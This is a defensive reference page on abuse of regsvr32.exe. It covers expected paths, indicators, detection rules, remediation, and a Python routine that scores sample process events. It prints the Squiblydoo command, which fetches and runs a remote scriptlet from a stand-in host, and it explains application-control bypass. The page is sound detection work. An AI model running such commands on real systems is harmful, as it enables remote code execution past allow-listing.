Tags: High Risk, Windows, Legitimate, Commonly Abused
regsvr32.exe (System Utility)
regsvr32.exe - COM Registration LOLBin Security Analysis
regsvr32.exe registers COM DLLs. It is a **LOLBin** abused to execute remote scriptlets via the /s /n /u /i switches (the "Squiblydoo" technique). Because it is a signed Microsoft binary it is often allowed by application control, and its downloads go through the system proxy.
Risk Summary
HIGH priority. regsvr32.exe with /i:http... is a strong IOC. Monitor for network activity and remote script execution patterns.
Overview
What is regsvr32.exe?
regsvr32.exe registers and unregisters COM DLLs.
Security Significance
- LOLBin: Documented in LOLBAS
- Squiblydoo: Remote script execution technique
- Proxy-Aware: Uses system proxy for downloads
- AppLocker Bypass: Often whitelisted
Normal Behavior
| Property | Expected Value |
|---|---|
| Path | C:\Windows\System32\regsvr32.exe |
| Path (32-bit) | C:\Windows\SysWOW64\regsvr32.exe |
| Usage | During software installation |
Common Locations
- C:\Windows\System32\regsvr32.exe
- C:\Windows\SysWOW64\regsvr32.exe
Suspicious Indicators
| Indicator | Risk |
|---|---|
| /i:http... URL | CRITICAL |
| /s /n /u /i combo | CRITICAL |
| scrobj.dll reference | HIGH |
| Network connections | HIGH |
Abuse Techniques
Squiblydoo Technique (T1218.010)
regsvr32.exe /s /n /u /i:http://evil.com/file.sct scrobj.dll
This downloads and executes a remote SCT (scriptlet) file.
Detection
regsvr32.exe CommandLine CONTAINS "http" → ALERT: CRITICAL
regsvr32.exe CommandLine CONTAINS "scrobj.dll" → ALERT: HIGH
regsvr32.exe NetworkConnection = True → ALERT: HIGH
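The three rules above, turned into a small scoring routine. This is an added example, not code from the original page; it runs over constructed Sysmon-style process-creation records (the command lines, paths and the `example.invalid` host are sample values), and it also applies the expected-path check implied by the Normal Behavior table, which is an assumption on top of the three listed rules.

```python
"""Score regsvr32.exe process events against the detection rules on this page.

Added example for this page. The events below are constructed sample data,
not real telemetry; the field layout loosely follows a Sysmon Event ID 1
(process creation) record plus a flag for a later network connection.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str                 # full path of the executed binary
    command_line: str          # command line as logged
    network_connection: bool   # did the process later open a network connection


# Expected locations, taken from the Normal Behavior table (lowercased for comparison).
EXPECTED_PATHS = {
    r"c:\windows\system32\regsvr32.exe",
    r"c:\windows\syswow64\regsvr32.exe",
}

URL_RE = re.compile(r"https?://", re.IGNORECASE)
SEVERITY_RANK = {"NONE": 0, "HIGH": 1, "CRITICAL": 2}


def _switches(command_line: str) -> set[str]:
    """Collect switch letters: '/i:http://x' -> 'i', '/s' -> 's', '-u' -> 'u'."""
    found = set()
    for tok in command_line.split():
        if tok[:1] in ("/", "-"):
            found.add(tok[1:].split(":", 1)[0].lower())
    return found


def score_event(ev: ProcessEvent) -> tuple[str, list[str]]:
    """Return (highest severity, list of triggered indicators) for one event.

    Events for anything other than regsvr32.exe score NONE with no findings.
    """
    if ev.image.rsplit("\\", 1)[-1].lower() != "regsvr32.exe":
        return "NONE", []

    findings: list[tuple[str, str]] = []
    cl = ev.command_line

    # Rule 1 (page): command line contains a URL -> CRITICAL
    if URL_RE.search(cl):
        findings.append(("CRITICAL", "command line contains a URL (remote /i: target)"))
    # Squiblydoo switch combination from the indicator table -> CRITICAL.
    # Checked separately from the URL so a locally staged .sct is still caught.
    if {"s", "n", "u", "i"} <= _switches(cl):
        findings.append(("CRITICAL", "/s /n /u /i switch combination"))
    # Rule 2 (page): scrobj.dll reference -> HIGH
    if "scrobj.dll" in cl.lower():
        findings.append(("HIGH", "scrobj.dll referenced"))
    # Rule 3 (page): network connection from regsvr32.exe -> HIGH
    if ev.network_connection:
        findings.append(("HIGH", "network connection from regsvr32.exe"))
    # Assumption beyond the page's rules: binary not in an expected location -> HIGH
    if ev.image.lower() not in EXPECTED_PATHS:
        findings.append(("HIGH", f"unexpected image path {ev.image}"))

    severity = "NONE"
    for sev, _ in findings:
        if SEVERITY_RANK[sev] > SEVERITY_RANK[severity]:
            severity = sev
    return severity, [f"{sev}: {why}" for sev, why in findings]


# Constructed sample events (not real data).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s C:\Program Files\Vendor\component.dll", False),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 "regsvr32.exe /s /n /u /i:http://example.invalid/file.sct scrobj.dll", True),
    ProcessEvent(r"C:\Windows\SysWOW64\regsvr32.exe",
                 r"regsvr32.exe /s /n /u /i:C:\Users\Public\payload.sct scrobj.dll", False),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 "rundll32.exe shell32.dll,Control_RunDLL", False),
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        severity, findings = score_event(ev)
        print(f"[{severity}] {ev.command_line}")
        for line in findings:
            print("    ", line)
```

The second sample (remote .sct over HTTP) trips all four rules; the third shows why the switch combination is scored on its own: a scriptlet dropped to disk first never produces the "http" string, but still registers as CRITICAL.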
Remediation Steps
- Block regsvr32.exe network access via firewall
- Monitor for /i: parameter with URLs
- Use Application Control to restrict DLL registration
Investigation Checklist
- Check command line for URLs
- Look for scrobj.dll references
- Review network connections
- Check for downloaded scriptlets
MITRE ATT&CK Techniques: T1218.010 (System Binary Proxy Execution: Regsvr32)
Last verified: January 18, 2026